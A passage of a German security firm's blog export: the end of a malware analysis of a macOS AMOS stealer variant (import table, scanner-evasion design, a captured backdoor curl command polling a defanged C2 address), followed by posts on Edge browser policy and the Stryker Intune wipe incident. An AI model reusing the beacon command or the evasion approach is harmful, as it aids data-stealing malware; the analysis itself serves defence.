...)\n",[1524,3422,3420],{"__ignoreMap":863},[810,3424,3426],{"id":3425},"die-import-tabelle-als-waffe","Die Import-Tabelle als Waffe",[806,3428,1536],{},[806,3430,3431],{},"Die vollständige Import-Tabelle dieser Binary:",[1541,3433,3434],{"style":1543},[1545,3435,3438],{"className":3436,"code":3437,"language":916},[1548],"// C runtime / memory\n_memcpy _memmove _memset _bzero\n\n// Process execution\n_fork _execvp _execl __exit\n\n// IPC / pipes\n_pipe _dup2 _close _write\n\n// Synchronisation\n_waitpid _usleep\n\n// Stack protection\n___stack_chk_fail ___stack_chk_guard\n\n// C++ runtime\noperator.new operator.delete __Unwind_Resume\n___cxa_allocate_exception ___cxa_throw ___cxa_begin_catch\n___cxa_end_catch ___cxa_free_exception ___gxx_personality_v0\nterminate logic_error bad_array_new_length __next_prime\n\n// STL containers\nappend reserve push_back operator=\n\n// Dynamic linking\ndyld_stub_binder\n",[1524,3439,3437],{"__ignoreMap":863},[806,3441,3442],{},"Insgesamt 27 Symbole. Was fehlt, ist mindestens so aufschlussreich wie was vorhanden ist.",[1671,3444,3446],{"id":3445},"abwesend-netzwerk","Abwesend: Netzwerk",[806,3448,1677],{},[1541,3450,3451],{"style":1543},[1545,3452,3455],{"className":3453,"code":3454,"language":916},[1548],"socket connect bind listen\naccept send recv sendto\nrecvfrom getaddrinfo gethostbyname\n",[1524,3456,3454],{"__ignoreMap":863},[1671,3458,3460],{"id":3459},"abwesend-dateisystem","Abwesend: Dateisystem",[806,3462,1677],{},[1541,3464,3465],{"style":1543},[1545,3466,3469],{"className":3467,"code":3468,"language":916},[1548],"open read fopen fread\nfwrite fclose stat unlink\nmkdir rename opendir readdir\n",[1524,3470,3468],{"__ignoreMap":863},[1671,3472,3474],{"id":3473},"abwesend-prozess-introspektion","Abwesend: Prozess-Introspektion",[806,3476,1677],{},[1541,3478,3479],{"style":1543},[1545,3480,3483],{"className":3481,"code":3482,"language":916},[1548],"getpid getuid getenv sysctl\n",[1524,3484,3482],{"__ignoreMap":863},[1671,3486,3488],{"id":3487},"abwesend-kryptografie","Abwesend: Kryptografie",[806,3490,1536],{},[1541,3492,3493],{"style":1543},[1545,3494,3497],{"className":3495,"code":3496,"language":916},[1548],"CCCrypt SecItemAdd SecKeychainFind\n",[1524,3498,3496],{"__ignoreMap":863},[806,3500,3501,3502,2289,3505,3508,3509,2289,3512,3515],{},"Bei einem traditionellen Malware-Sample erwartet man Netzwerk-Imports (",[1524,3503,3504],{},"socket",[1524,3506,3507],{},"connect",") oder Datei-Imports (",[1524,3510,3511],{},"fopen",[1524,3513,3514],{},"write","). Diese Binary hat keinen einzigen. Für einen Standard-Scanner sieht sie aus wie ein harmloser Prozess-Launcher, und das ist so geplant: eine bewusste Architekturentscheidung, die statische Analysetools ins Leere laufen lässt.",[806,3517,1884,3518,3520],{},[1524,3519,1887],{},"-Binary führt den Diebstahl nicht selbst durch. Ihr einziger Zweck ist es, den eigentlichen bösartigen Payload, ein stark obfuskiertes AppleScript, abzusetzen und auszuführen. Ein EDR oder AV, das nach bösartigen Binaries sucht, sieht hier einen Loader ohne Netzwerk- oder Datei-I/O und stuft ihn möglicherweise als sauber ein, ohne zu erkennen, dass die Binary ein spezialisiertes Zustellsystem für einen High-Level-Skript-Payload ist.",[1508,3522],{},[1511,3524,3526],{"id":3525},"die-backdoor","Die Backdoor",[806,3528,816],{},[806,3530,3531,3532,3535],{},"Der Incident endete nicht nach der initialen Kompromittierung. Microsoft Defender-Telemetrie zeigte einen Prozess, der von ",[1524,3533,3534],{},"/Users/\u003Credacted>/.mainhelper"," aus lief und einen externen Server abfragte:",[1541,3537,3538],{"style":1543},[1545,3539,3541],{"className":1747,"code":3540,"language":1749,"meta":863,"style":863},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[1524,3542,3543],{"__ignoreMap":863},[1588,3544,3545,3548,3550],{"class":1590,"line":1591},[1588,3546,3547],{"class":1756},"sh",[1588,3549,1761],{"class":1760},[1588,3551,3552],{"class":1774}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[806,3554,3555],{},"Der Base64-String dekodierte sich zu einer 16-Byte-Geräte-UUID, dem eindeutigen Identifier, den die C2-Infrastruktur des Angreifers diesem Gerät am Tag der Erstinfektion zugewiesen hatte.",[806,3557,1884,3558,3561,3562,3565,3566,3568],{},[1524,3559,3560],{},".mainhelper","-Binary (SHA-256: ",[1524,3563,3564],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",") war am Tag des Incidents durch den osascript-Dropper via ",[1524,3567,1757],{}," installiert worden.",[1508,3570],{},[1511,3572,3574],{"id":3573},"die-stärke-des-kollektiven-schilds-unsere-shared-threat-intelligence-plattform","Die Stärke des kollektiven Schilds: Unsere Shared-Threat-Intelligence-Plattform",[806,3576,816],{},[806,3578,3579],{},"Wenn in unserem SOC ein Alert ausgelöst wird, beginnt die Uhr nicht nur für den betroffenen Kunden zu laufen, sondern für jede Organisation unter dem glueckkanja-Schutzschild. Diese Untersuchung einer undokumentierten AMOS-Variante macht deutlich, was die Intelligence Gap in der Praxis bedeutet: ein gefährliches Zeitfenster, in dem klassische Anbieter blind sind, weil sie die Bedrohung noch nicht gesehen haben.",[806,3581,3582],{},"Hier zeigt unsere proprietäre Shared Threat Intelligence Platform ihren Wert, entwickelt exklusiv für glueckkanja-CSOC-Kunden. Wir warten nicht auf Branchen-Updates, wir erzeugen sie. Während unsere Analysten noch die letzten Schichten des ARM64-Assembly demontierten, verteilte unsere Automated Orchestration Engine bereits die extrahierten Indikatoren über unser gesamtes Ökosystem. Das erzeugt Herd-Immunität: Was an einem einzigen Endpoint entdeckt wird, ist innerhalb von Minuten eine blockierte Bedrohung für jede Organisation unter unserem Schutz.",[806,3584,3585],{},"Reaktive Sicherheit funktioniert nicht gegen Bedrohungen, die gezielt durch die Lücken konventioneller Abwehrmechanismen schlüpfen. Die Antwort liegt in der Verbindung menschlicher Expertise mit einer Architektur, die dieses Wissen sofort und skaliert einsetzt. Durch unser Shared-Intelligence-Modell kehrt sich der Zeitvorteil des Angreifers um: Unsere Kunden sind geschützt, bevor die Bedrohung von der Branche überhaupt erkannt wird.",[3587,3588,3589,3594,3597,3600],"blockquote",{},[806,3590,3591],{},[1736,3592,3593],{},"Hinweis zum Datenschutz",[806,3595,3596],{},"Identifizierende Informationen wurden in dieser Veröffentlichung anonymisiert. Spezifische technische Details, Indikatoren und Zeitstempel können leicht verändert worden sein, um den laufenden Schutz der betroffenen Umgebung zu gewährleisten, ohne die technische Integrität der Analyse zu beeinträchtigen.",[806,3598,3599],{},"Die technischen Analysen und Indicators of Compromise (IOCs) in diesem Bericht dienen ausschließlich der Information und Weiterbildung. Sie werden nach bestem Wissen bereitgestellt. glueckkanja AG übernimmt keine ausdrücklichen oder impliziten Garantien hinsichtlich Vollständigkeit oder Genauigkeit und haftet nicht für Schäden, Verluste oder Sicherheitsvorfälle, die aus der Verwendung der hier geteilten Informationen, Regeln oder Signaturen entstehen. Wir empfehlen, alle Indikatoren und Regeln vor dem Einsatz in einer kontrollierten Umgebung zu validieren.",[806,3601,3602],{},"Beschriebene Indikatoren und Techniken können sich mit bekannten Malware-Familien überschneiden und sind nicht exklusiv einer einzelnen Kampagne zuzuordnen.",[3604,3605,3606],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":863,"searchDepth":864,"depth":864,"links":3608},[3609,3610,3611,3612,3619,3620,3621,3622,3630,3637],{"id":1532,"depth":864,"text":1533},{"id":1571,"depth":864,"text":1572},{"id":1631,"depth":864,"text":1632},{"id":1663,"depth":864,"text":1664,"children":3613},[3614,3615,3616,3617,3618],{"id":1673,"depth":1814,"text":1674},{"id":1688,"depth":1814,"text":1689},{"id":1702,"depth":1814,"text":1703},{"id":1711,"depth":1814,"text":1712},{"id":1728,"depth":1814,"text":1729},{"id":1894,"depth":864,"text":1895},{"id":1984,"depth":864,"text":1985},{"id":2100,"depth":864,"text":2101},{"id":2171,"depth":864,"text":2172,"children":3623},[3624,3625,3626,3627,3628,3629],{"id":2186,"depth":1814,"text":2187},{"id":2475,"depth":1814,"text":2476},{"id":2730,"depth":1814,"text":2731},{"id":2925,"depth":1814,"text":2926},{"id":3012,"depth":1814,"text":3013},{"id":3164,"depth":1814,"text":3165},{"id":3218,"depth":864,"text":3219,"children":3631},[3632,3633,3634,3635,3636],{"id":3234,"depth":1814,"text":3235},{"id":3300,"depth":1814,"text":3301},{"id":3342,"depth":1814,"text":3343},{"id":3384,"depth":1814,"text":3385},{"id":3411,"depth":1814,"text":3412},{"id":3425,"depth":864,"text":3426,"children":3638},[3639,3640,3641,3642],{"id":3445,"depth":1814,"text":3446},{"id":3459,"depth":1814,"text":3460},{"id":3473,"depth":1814,"text":3474},{"id":3487,"depth":1814,"text":3488},{"lang":4,"seoTitle":3644,"titleClass":873,"date":3645,"categories":3646,"blogtitlepic":3647,"socialimg":3648,"customExcerpt":3649,"keywords":3650,"maxContent":508,"asideNav":3651,"footer":3666,"contactInContent":3667,"published":508,"hreflang":3698},"AMOS-Stealer-Variante: Reverse Engineering einer unbekannten macOS-Malware","2026-04-10",[371],"head-amos-stealer.png","/blog/heads/head-amos-stealer.png","Eine bisher undokumentierte AMOS-Stealer-Variante kompromittierte einen macOS-Endpoint. Keine bekannten Hashes, keine C2-Daten in öffentlichen Datenbanken. Unser SOC demontierte sechs Obfuskierungsschichten, extrahierte alle Indikatoren und verteilte den Schutz an alle SOC-Kunden innerhalb von Stunden, noch bevor die Branche das Sample überhaupt gesehen hatte.","AMOS Stealer, macOS Malware, Reverse Engineering, Malware-Analyse, Ghidra, ARM64, Incident Response, Threat Intelligence, CSOC, macOS-Sicherheit, Stealer-Malware, Shared Threat Intelligence, Atomic macOS Stealer",{"menuItems":3652},[3653,3656,3658,3661,3663],{"href":3654,"text":3655},"#der-vorfall-ein-unbekanntes-ioc-szenario","Der Vorfall",{"href":3657,"text":1533},"#stage-1-sandbox-pruefungen",{"href":3659,"text":3660},"#stage-2-reverse-engineering-der-helper-binary","Stage 2: Binary-Analyse",{"href":3662,"text":3526},"#die-backdoor",{"href":3664,"text":3665},"#die-staerke-des-kollektiven-schilds-unsere-shared-threat-intelligence-plattform","Shared Threat Intelligence",{"noMargin":508},{"quote":508,"infos":3668},{"bgColor":883,"headline":3669,"subline":3670,"level":810,"textStyling":887,"flush":888,"person":3671,"form":3676},"Kontakt aufnehmen","Wollt ihr wissen, wie unsere Shared Threat Intelligence Platform euch vor unbekannten Malware-Varianten schützt, noch bevor die Branche davon erfährt? Sprecht uns an.",{"image":3672,"cloudinary":508,"alt":3673,"name":1127,"quotee":1127,"quoteeTitle":3674,"quote":3675},"/people/people-jan-geisbauer-csoc.jpg","Porträt von Jan Geisbauer, Head of Security bei glueckkanja","Head of Security","Das Gefährliche an dieser Variante war nicht die technische Komplexität, so beeindruckend sie auch ist. Gefährlich war das Zeitfenster. Ohne Shared Threat Intelligence hätten unsere anderen Kunden stundenlang ungeschützt dagestanden, während wir noch analysierten.",{"ctaText":905,"cta":3677,"method":870,"action":908,"fields":3678},{"skin":907},[3679,3680,3682,3684,3686,3689,3691,3692,3693,3695,3696,3697],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":3681},"Bitte gebt euren Namen ein.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":3683},"Bitte gebt euer Unternehmen ein.",{"label":923,"type":924,"id":924,"required":508,"requiredMsg":3685},"Bitte gebt eure E-Mail-Adresse ein.",{"label":3687,"type":928,"id":929,"required":749,"requiredMsg":3688},"Eure Nachricht an uns","Bitte gebt eine Nachricht ein.",{"label":3690,"type":933,"id":934,"required":508,"requiredMsg":935},"Eure Daten werden bei uns zum Zweck der Bearbeitung und Beantwortung eurer Anfrage gespeichert. Weitere Informationen zum Datenschutz findet ihr in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":937,"value":371},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":3694},"Form: Blog AMOS Stealer CSOC | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},[3699,3701,3703],{"lang":953,"href":3700},"/en/posts/2026-04-10-incident-to-intelligence",{"lang":4,"href":3702},"/de/posts/2026-04-10-incident-to-intelligence",{"lang":956,"href":3704},"/es/posts/2026-04-10-incident-to-intelligence","/posts/2026-04-10-incident-to-intelligence",{"title":1494,"description":1500},"posts/2026-04-10-incident-to-intelligence",[3709,3710,3711,3712,3713],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations Center","UOEeAiDWvGEnldyGolhkHvB5w7KQbGJ0wkzjF62ajZs",{"id":3716,"title":3717,"author":3718,"body":3719,"cta":764,"description":3723,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":3919,"moment":3921,"navigation":508,"path":3947,"seo":3948,"stem":3949,"tags":764,"webcast":749,"__hash__":3950},"content_de/posts/2026-03-21-microsoft-edge-corporate-browser.md","Warum Edge euer einziger Corporate Browser sein sollte",[1023],{"type":803,"value":3720,"toc":3911},[3721,3724,3728,3730,3736,3740,3742,3745,3749,3751,3754,3769,3773,3775,3781,3787,3790,3832,3840,3844,3846,3854,3873,3877,3879,3882,3908],[806,3722,3723],{},"Die Wahl des Browsers ist in Unternehmensumgebungen eine strategische Entscheidung: Sie beeinflusst direkt, wie viel Sicherheit und Verwaltungsaufwand ihr tatsächlich habt. Google Chrome war lange die naheliegende Option, aber Microsoft Edge hat sich zu einem Browser entwickelt, der direkt in den bestehenden Stack greift, vor allem wenn Microsoft 365 im Einsatz ist und die Verwaltung über Intune läuft.",[810,3725,3727],{"id":3726},"sicherheit","Sicherheit",[806,3729,816],{},[806,3731,3732,3733,3735],{},"Ein verwalteter Microsoft Edge Browser sorgt dafür, dass Schutzfunktionen konsistent auf allen Endgeräten greifen. Mit nativer Integration in Microsoft Defender SmartScreen schützt Edge vor Phishing, Malware und weiteren Bedrohungen. Über Intune lassen sich Richtlinien eng fassen: Verhalten steuern, riskante Erweiterungen blockieren, sicheres Browsen durchsetzen. glueckkanja's ",[833,3734,45],{"href":46}," liefert aktuelle Edge-Richtlinien, die an Microsofts Security-Baselines ausgerichtet sind.",[810,3737,3739],{"id":3738},"synchronisation-mit-entra-id","Synchronisation mit Entra ID",[806,3741,816],{},[806,3743,3744],{},"Edge synchronisiert Benutzerdaten wie Favoriten, Passwörter und Einstellungen sicher über Entra ID-Konten geräteübergreifend. Das ist besonders relevant in hybriden Arbeitsumgebungen, wo Mitarbeitende zwischen Unternehmensgeräten, virtuellen Desktops und mobilen Geräten wechseln, ohne dabei Kontext oder Produktivität zu verlieren.",[810,3746,3748],{"id":3747},"komplexität-durch-mehrere-browser","Komplexität durch mehrere Browser",[806,3750,816],{},[806,3752,3753],{},"Wer Google Chrome parallel zu Edge betreibt, schafft sich Mehrarbeit:",[2738,3755,3757,3763],{"style":3756},"margin: 0.25rem 0",[2741,3758,3759,3762],{},[1736,3760,3761],{},"Backup und Sync:"," Andere Browser erfordern häufig Drittanbieter-Konten, etwa ein Google-Konto, um die Synchronisierung zu ermöglichen.",[2741,3764,3765,3768],{},[1736,3766,3767],{},"Richtlinienpflege:"," Jeder Browser braucht ein eigenes Set an Sicherheits- und Konfigurationsrichtlinien. Das bindet Ressourcen, erhöht das Risiko von Fehlkonfigurationen und erschwert Audits.",[810,3770,3772],{"id":3771},"chrome-umleitung-via-intune","Chrome-Umleitung via Intune",[806,3774,816],{},[806,3776,3777,3778,3780],{},"Für die Umleitung von Chrome auf Edge gibt es eine fertige Richtlinie, die sich mit glueckkanja's ",[833,3779,45],{"href":46}," in wenigen Minuten einrichten lässt. Nutzer landen auf einer Seite, die Microsoft Edge als Standard-Corporate-Browser vorstellt, mit einem direkten Link zum Öffnen.",[806,3782,3783],{},[1449,3784],{"alt":3785,"src":3786},"Microsoft Edge als Standard-Corporate-Browser","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[806,3788,3789],{},"Die Konfigurationsrichtlinie regelt, wie Chrome eingeschränkt und umgeleitet wird:",[2738,3791,3792,3805,3814,3820,3826],{"style":3756},[2741,3793,3794,3797,3798,3801,3802,2786],{},[1736,3795,3796],{},"URL-Zulassungsliste:"," Nur bestimmte URLs sind erlaubt, etwa die Landingpage ",[1524,3799,3800],{},"https://edge.glueckkanja.com/"," und der Moniker ",[1524,3803,3804],{},"microsoft-edge:*",[2741,3806,3807,3810,3811,3813],{},[1736,3808,3809],{},"URL-Sperrliste:"," Alle anderen URLs werden blockiert (",[1524,3812,2775],{},"), was das allgemeine Browsen in Chrome effektiv unterbindet.",[2741,3815,3816,3819],{},[1736,3817,3818],{},"Startseite und neuer Tab:"," Beide zeigen auf die Landingpage, die zur Nutzung von Edge auffordert.",[2741,3821,3822,3825],{},[1736,3823,3824],{},"Protokollverarbeitung:"," Chrome öffnet beim Klick auf URLs der Landingpage automatisch Edge.",[2741,3827,3828,3831],{},[1736,3829,3830],{},"Erweiterungskontrolle:"," Zusätzliche Einstellungen unterbinden die Installation von Erweiterungen.",[806,3833,3834,3835],{},"Beispielrichtlinie als Download: ",[833,3836,3839],{"href":3837,"rel":3838},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[1410],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[810,3841,3843],{"id":3842},"landingpage-via-github-pages","Landingpage via GitHub Pages",[806,3845,816],{},[806,3847,3848,3849],{},"Die Seite läuft über GitHub Pages. Wer sie anpassen will, kann das direkt im Projekt tun: ",[833,3850,3853],{"href":3851,"rel":3852},"https://github.com/glueckkanja/edge-redirection-landingpage",[1410],"edge-redirection-landingpage",[806,3855,3856],{},[833,3857,3869],{"role":3858,"className":3859,"dataText":3864,"href":3865,"target":513,"rel":3866,"type":3868},"button",[3860,3861,3862,3863],"cta","btn","btn-primary","vue-component","Landingpage in Aktion","https://edge.glueckkanja.com",[3867],"noopener","Button",[1588,3870,3864],{"className":3871},[3872],"cta__text",[810,3874,3876],{"id":3875},"im-überblick","Im Überblick",[806,3878,816],{},[806,3880,3881],{},"Microsoft Edge bietet eine sichere, verwaltbare Browsing-Umgebung mit tiefer Integration in Microsoft 365 und ist damit die logische Wahl als Standard-Corporate-Browser. Die wichtigsten Vorteile im Überblick:",[2738,3883,3884,3887,3890,3893,3896,3899,3902,3905],{"style":3756},[2741,3885,3886],{},"Entra ID-Integration mit SSO",[2741,3888,3889],{},"Cloud-basierte Synchronisierung und Backup über Microsoft 365 auf mehreren Plattformen",[2741,3891,3892],{},"Integriertes Sicherheits-Ökosystem mit Microsoft Defender SmartScreen und Microsoft Endpoint DLP",[2741,3894,3895],{},"Unterstützung von Intune App Protection Policies",[2741,3897,3898],{},"Browser-Management über Microsoft 365 Admin Center und Intune",[2741,3900,3901],{},"Internet Explorer-Modus für Legacy-Anwendungen",[2741,3903,3904],{},"Corporate Branding",[2741,3906,3907],{},"Copilot-Integration",[806,3909,3910],{},"Wer auf Edge standardisiert, reduziert Komplexität, stärkt die Sicherheit und vereinfacht den Support. Den Umleitungsansatz auf weitere Browser auszuweiten liegt von hier aus nah.",{"title":863,"searchDepth":864,"depth":864,"links":3912},[3913,3914,3915,3916,3917,3918],{"id":3726,"depth":864,"text":3727},{"id":3738,"depth":864,"text":3739},{"id":3747,"depth":864,"text":3748},{"id":3771,"depth":864,"text":3772},{"id":3842,"depth":864,"text":3843},{"id":3875,"depth":864,"text":3876},{"lang":4,"seoTitle":3920,"titleClass":873,"date":3921,"blogtitlepic":3922,"socialimg":3923,"customExcerpt":3924,"keywords":3925,"hreflang":3926,"published":508,"asideNav":3933},"Microsoft Edge als gesicherter Corporate Browser: Sicherheit, Sync und Chrome-Umleitung via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","Kein Unternehmen hat Chrome wirklich gewählt; er war einfach da, mit eigener Sync-Logik, eigener Kontoverwaltung, eigener Richtlinienoberfläche. Microsoft Edge dagegen greift direkt in die Infrastruktur, die ohnehin schon läuft: Entra ID, Intune, Defender. Dieser Beitrag zeigt, wie der Wechsel aussieht, wie Chrome per Intune-Richtlinie auf eine Landingpage umgeleitet wird und was wegfällt, wenn man aufhört, zwei Browser parallel zu betreiben.","Microsoft Edge, Corporate Browser, Microsoft Intune, Entra ID, Chrome-Umleitung, Managed Intune, Browser-Richtlinie, Microsoft Defender SmartScreen, Enterprise Browser, Browser-Management, URL-Sperrliste, URL-Zulassungsliste",[3927,3929,3931],{"lang":4,"href":3928},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":953,"href":3930},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":956,"href":3932},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":3934},[3935,3937,3939,3941,3943,3945],{"href":3936,"text":3727},"#sicherheit",{"href":3938,"text":3739},"#synchronisation-mit-entra-id",{"href":3940,"text":3748},"#komplexität-durch-mehrere-browser",{"href":3942,"text":3772},"#chrome-umleitung-via-intune",{"href":3944,"text":3843},"#landingpage-via-github-pages",{"href":3946,"text":3876},"#im-überblick","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":3717,"description":3723},"posts/2026-03-21-microsoft-edge-corporate-browser","nk6RYmsy9aHIPrWtuCZFxqzG4PVOnBoAgI-NYSTo3pM",{"id":3952,"title":3953,"author":3954,"body":3955,"cta":764,"description":3959,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":4199,"moment":4201,"navigation":508,"path":4256,"seo":4257,"stem":4258,"tags":4259,"webcast":749,"__hash__":4262},"content_de/posts/2026-03-20-stryker-attack-intune-privilege.md","Ein Admin-Konto war alles, was es brauchte.",[1127],{"type":803,"value":3956,"toc":4187},[3957,3960,3963,3967,3969,3972,3975,3979,3981,3984,3987,3990,3993,3997,3999,4002,4005,4009,4011,4014,4017,4020,4024,4026,4029,4035,4039,4041,4047,4050,4053,4056,4063,4066,4072,4081,4085,4087,4093,4096,4105,4108,4111,4114,4117,4120,4123,4127,4129,4132,4135,4138,4146,4149,4152,4156,4158],[806,3958,3959],{},"Mittwoch, 11. März 2026. Mitarbeiter in Stryker-Büros in 79 Ländern schalteten ihre Computer ein und fanden sie leer. Login-Bildschirme ersetzt durch ein Logo. Firmen-Laptops, Diensthandys, private Geräte, die im BYOD-Programm des Unternehmens registriert waren – alle gleichzeitig gelöscht, über Nacht. Keine Ransomware, keine Malware-Signaturen, nichts, das ein Endpoint-Detection-Tool hätte erkennen können.",[806,3961,3962],{},"Der Angreifer, eine pro-iranische Hacktivistengruppe namens Handala, hatte Strykers eigene IT-Management-Infrastruktur zur Waffe gemacht.",[810,3964,3966],{"id":3965},"was-wirklich-passiert-ist","Was wirklich passiert ist",[806,3968,816],{},[806,3970,3971],{},"Der Kern des Angriffs war kein ausgefeilter Exploit und keine Zero-Day-Schwachstelle, sondern etwas weitaus Einfacheres und weitaus Häufigeres: Ein Administrator-Konto wurde kompromittiert, und dieses Konto hatte Zugang zu Microsoft Intune.",[806,3973,3974],{},"Laut Berichten von BleepingComputer wurden etwa 80.000 Geräte zwischen 5:00 und 8:00 Uhr UTC gelöscht. Handala behauptete, die Zahl habe 200.000 überschritten, darunter Server und mobile Geräte im globalen Betrieb des Unternehmens in 79 Ländern. Ein Angriff, ausgeführt ausschließlich über eine legitime Management-Konsole.",[810,3976,3978],{"id":3977},"warum-dieser-angriff-erfolgreich-war","Warum dieser Angriff erfolgreich war",[806,3980,816],{},[806,3982,3983],{},"Es gibt ein strukturelles Problem an der Wurzel dieses Vorfalls, das nicht spezifisch für Stryker ist. Es betrifft die meisten Unternehmen.",[806,3985,3986],{},"Die meisten Organisationen behandeln administrative Aufgaben und die tägliche Arbeit als Aktivitäten, die auf demselben Gerät unter derselben Benutzeridentität problemlos koexistieren können. Ein IT-Administrator beantwortet E-Mails, surft im Internet, klickt gelegentlich auf einen Link und verwaltet von derselben Sitzung, auf demselben Gerät aus Cloud-Infrastruktur, genehmigt Zugriffsänderungen oder berührt, wie in diesem Fall, eine Geräteverwaltungskonsole mit der Berechtigung, die gesamte Geräteflotte zu löschen.",[806,3988,3989],{},"Das ist die Angriffsfläche. Wenn der alltägliche Arbeitskontext und der privilegierte Administrationskontext einen gemeinsamen Endpunkt und eine gemeinsame Identität teilen, ist jede Kompromittierung dieses Endpunkts automatisch eine Kompromittierung von allem, was diese Identität erreichen kann. Phishing, Credential-Diebstahl über Infostealer-Malware, Adversary-in-the-Middle (AiTM) Session-Token-Diebstahl – all das wird zu einem direkten Pfad zu den mächtigsten Kontrollen in der Umgebung. Keine Privilege-Eskalation erforderlich. Der Angreifer nutzt einfach das, was bereits vorhanden ist.",[806,3991,3992],{},"Im Fall von Stryker umfasste dieser Zugang einen Intune-Tenant, der Geräte auf sechs Kontinenten verwaltete.",[810,3994,3996],{"id":3995},"cisa-hat-genug-gesehen","CISA hat genug gesehen",[806,3998,816],{},[806,4000,4001],{},"Das Ausmaß und die Dreistigkeit des Angriffs lösten eine ungewöhnliche Reaktion aus: CISA, die US-amerikanische Cybersecurity and Infrastructure Security Agency, veröffentlichte Leitlinien, die direkt das Risiko kompromittierter Geräteverwaltungsplattformen adressieren. Die Behörde bestätigte, dass sie den Angriffsvektor kannte, und forderte Organisationen auf, konkrete Maßnahmen zu ergreifen – sicherzustellen, dass hochriskante Intune-Funktionen wie das Löschen von Geräten die Genehmigung eines zweiten Administrators erfordern, bevor sie ausgeführt werden.",[806,4003,4004],{},"Das ist ein seltenes und bedeutsames Signal. Wenn eine Bundesbehörde für Sicherheit unmittelbar nach einem konkreten Vorfall gezielte Leitlinien herausgibt, ist die Botschaft klar: Das ist kein Randfall. Das ist ein Muster, und andere Organisationen sind mit hoher Wahrscheinlichkeit demselben Risiko ausgesetzt.",[810,4006,4008],{"id":4007},"trennung-ist-kein-luxus-sie-ist-die-kontrolle","Trennung ist kein Luxus. Sie ist die Kontrolle.",[806,4010,816],{},[806,4012,4013],{},"Der Stryker-Angriff zeigt in aller Deutlichkeit, welches Ausmaß ein flaches Privilege-Modell haben kann. Der Angreifer musste keine Privilegien durch eine Kette von Schwachstellen eskalieren. Er erlangte Zugang zu Anmeldedaten oder einem Session-Token auf einer Ebene und stellte fest, dass diese Ebene bereits ausreichte, um katastrophalen, globalen, irreversiblen Schaden zu verursachen.",[806,4015,4016],{},"Die architektonische Antwort auf dieses Problem hat einen Namen: das Microsoft Enterprise Access Model (EAM). Sein Kernprinzip ist die gestaffelte Administration: Privilegierte Operationen werden mit dedizierten Konten und dedizierten Geräten durchgeführt, strikt vom alltäglichen Arbeitskontext getrennt. Dieser Least-Privilege-Ansatz bedeutet, dass ein kompromittiertes Produktivitätskonto die Management-Ebene nicht erreichen kann und ein kompromittiertes Management-Konto keine Control-Plane-Operationen durchführen kann. Das gilt gleichermaßen für reine Cloud-Umgebungen und hybride Setups einschließlich On-Premises-Anbindung an Active Directory über Entra ID, wo ein einziges überprivilegiertes Konto nach wie vor die Cloud und die Domäne verbinden kann.",[806,4018,4019],{},"Die Idee ist einfach. Administrative Arbeit findet auf administrativen Geräten statt. Die Identität, die zur Verwaltung des Microsoft 365-Tenants, der Intune-Umgebung oder der Azure-Infrastruktur verwendet wird, ist niemals dieselbe Identität, die zum Lesen von E-Mails oder zur Teilnahme an Teams-Anrufen genutzt wird. Das Gerät, das für diese administrativen Sitzungen verwendet wird, ist gehärtet, eingeschränkt und vom regulären Internet-Browsing und dem Produktivitätskontext isoliert, der die Angriffsfläche erzeugt. Laterale Bewegung wird strukturell schwieriger, weil es keinen lateralen Pfad gibt.",[810,4021,4023],{"id":4022},"zwei-verteidigungsebenen","Zwei Verteidigungsebenen",[806,4025,816],{},[806,4027,4028],{},"Um dieses Bedrohungsmodell richtig zu adressieren, muss man gleichzeitig auf zwei Ebenen arbeiten: sichern, wer die Management-Ebene und deren Anmeldedaten berühren kann, und härten, wie diese Management-Ebene selbst konfiguriert und betrieben wird. Das sind nicht dasselbe Problem, und beide sind wichtig.",[806,4030,4031],{},[1449,4032],{"alt":4033,"src":4034},"Risiko- und Produktzuordnung für das Stryker-Angriffsszenario: Managed Red Tenant adressiert Identitäts- und Zugriffsrisiken, Managed Intune adressiert 